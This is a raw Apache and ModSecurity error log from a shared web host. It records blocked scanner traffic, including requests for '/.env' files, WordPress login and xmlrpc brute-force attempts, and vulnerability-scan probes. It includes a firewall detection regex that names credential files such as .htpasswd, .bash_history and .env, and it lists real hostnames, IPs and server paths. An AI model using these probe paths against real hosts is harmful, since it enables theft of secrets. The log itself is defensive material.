[Tue May 26 12:53:47.757345 2026] [security2:error] [pid 461618:tid 461869] [client 173.252.79.11:54970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIQAA1g0"]
[Tue May 26 12:53:47.869769 2026] [security2:error] [pid 461618:tid 461831] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIAAAANg"]
[Tue May 26 12:53:48.040498 2026] [security2:error] [pid 461618:tid 461759] [client 173.252.79.11:54978] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uMQAAkCg"]
[Tue May 26 12:53:48.442261 2026] [security2:error] [pid 461618:tid 461813] [client 173.252.79.9:47088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uSQAAxnY"]
[Tue May 26 12:53:48.848663 2026] [security2:error] [pid 461618:tid 461785] [client 173.252.79.3:44900] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uWwAAqiw"]
[Tue May 26 12:53:50.381132 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.381326 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.686392 2026] [security2:error] [pid 461618:tid 461824] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2urgAAANE"]
[Tue May 26 12:53:50.752809 2026] [security2:error] [pid 461618:tid 461845] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2upgAAAOY"]
[Tue May 26 12:53:50.764037 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVKhlyiSlSCHr1fdr2utgAAAJY"]
[Tue May 26 12:53:51.312138 2026] [autoindex:error] [pid 461618:tid 461771] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.338906 2026] [security2:error] [pid 461618:tid 461781] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKh1yiSlSCHr1fdr2u1gAAAKY"], referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.352480 2026] [autoindex:error] [pid 461618:tid 461764] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com/
[Tue May 26 12:53:52.122990 2026] [security2:error] [pid 461618:tid 461800] [client 74.249.173.207:4268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vAAAAALk"]
[Tue May 26 12:53:52.156757 2026] [security2:error] [pid 461618:tid 461780] [client 195.178.110.34:40954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKiFyiSlSCHr1fdr2vAgAAAKU"]
[Tue May 26 12:53:52.776796 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.776956 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.917419 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.917481 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:52.918081 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.918152 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:53.184119 2026] [security2:error] [pid 461618:tid 461768] [client 123.16.146.60:52052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.146.16.123.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vHAAAAJk"], referer: https://www.cagmedya.com/
[Tue May 26 12:53:53.504175 2026] [security2:error] [pid 461618:tid 461811] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vIAAAAMQ"]
[Tue May 26 12:53:53.888006 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vOQAAAJY"]
[Tue May 26 12:53:56.986063 2026] [security2:error] [pid 461618:tid 461721] [remote 103.95.119.103:34088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhAAA72Y"]
[Tue May 26 12:53:57.306530 2026] [security2:error] [pid 461618:tid 461818] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhwAAAMs"]
[Tue May 26 12:53:58.908376 2026] [security2:error] [pid 461618:tid 461871] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjlyiSlSCHr1fdr2vwAAAAQA"]
[Tue May 26 12:54:01.208076 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.208250 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.447480 2026] [core:crit] [pid 461618:tid 461819] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:02.399062 2026] [security2:error] [pid 461618:tid 461767] [client 195.178.110.34:36982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKklyiSlSCHr1fdr2wMwAAAJg"]
[Tue May 26 12:54:02.448375 2026] [security2:error] [pid 461618:tid 461760] [client 85.121.55.185:46662] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wKwAAAJE"]
[Tue May 26 12:54:02.656439 2026] [security2:error] [pid 461618:tid 461861] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wJwAAAPY"]
[Tue May 26 12:54:03.249588 2026] [security2:error] [pid 461618:tid 461838] [client 74.249.173.207:4400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVKk1yiSlSCHr1fdr2wQwAAAN8"]
[Tue May 26 12:54:04.938836 2026] [security2:error] [pid 461618:tid 461752] [client 74.249.173.207:4397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wcwAAAIk"]
[Tue May 26 12:54:05.066267 2026] [security2:error] [pid 461618:tid 461789] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wbAAAAK4"]
[Tue May 26 12:54:05.842491 2026] [security2:error] [pid 461618:tid 461849] [client 74.249.173.207:4396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-conf.php"] [unique_id "ahVKlVyiSlSCHr1fdr2wkgAAAOo"]
[Tue May 26 12:54:06.167815 2026] [core:crit] [pid 461618:tid 461799] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:06.521206 2026] [core:crit] [pid 461618:tid 461781] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:07.376185 2026] [security2:error] [pid 461618:tid 461784] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKllyiSlSCHr1fdr2w7AAAAKk"]
[Tue May 26 12:54:09.210574 2026] [security2:error] [pid 461618:tid 461828] [client 74.249.173.207:4414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVKmFyiSlSCHr1fdr2xZwAAANU"]
[Tue May 26 12:54:10.943920 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKmlyiSlSCHr1fdr2xswAAAPk"]
[Tue May 26 12:54:11.338916 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:50258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVKm1yiSlSCHr1fdr2xzQAAANc"]
[Tue May 26 12:54:12.473977 2026] [security2:error] [pid 461618:tid 461779] [client 157.20.138.61:59585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKnFyiSlSCHr1fdr2x7wAAAKQ"]
[Tue May 26 12:54:12.474119 2026] [security2:error] [pid 461618:tid 461779] [client 157.20.138.61:59585] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKnFyiSlSCHr1fdr2x7wAAAKQ"]
[Tue May 26 12:54:13.580778 2026] [security2:error] [pid 461618:tid 461830] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKnVyiSlSCHr1fdr2yBwAAANc"]
[Tue May 26 12:54:14.019602 2026] [security2:error] [pid 461618:tid 461773] [client 74.249.173.207:4438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/abc.php"] [unique_id "ahVKnlyiSlSCHr1fdr2yHAAAAJ4"]
[Tue May 26 12:54:15.352399 2026] [core:crit] [pid 461618:tid 461796] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:15.704766 2026] [security2:error] [pid 461618:tid 461812] [client 147.53.115.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKn1yiSlSCHr1fdr2yRwAAAMU"], referer: https://www.anujtradingco.com/
[Tue May 26 12:54:15.843604 2026] [security2:error] [pid 461618:tid 461653] [remote 74.7.241.58:54360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVKn1yiSlSCHr1fdr2ySwAApyI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/panel/welcome-modals
[Tue May 26 12:54:16.598279 2026] [security2:error] [pid 461618:tid 461816] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKoFyiSlSCHr1fdr2yWAAAAMk"]
[Tue May 26 12:54:16.969096 2026] [security2:error] [pid 461618:tid 461807] [client 147.53.115.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKoFyiSlSCHr1fdr2ybwAAAMA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230238&moderation-hash=3a3980b7652b86885efc1959deb47371
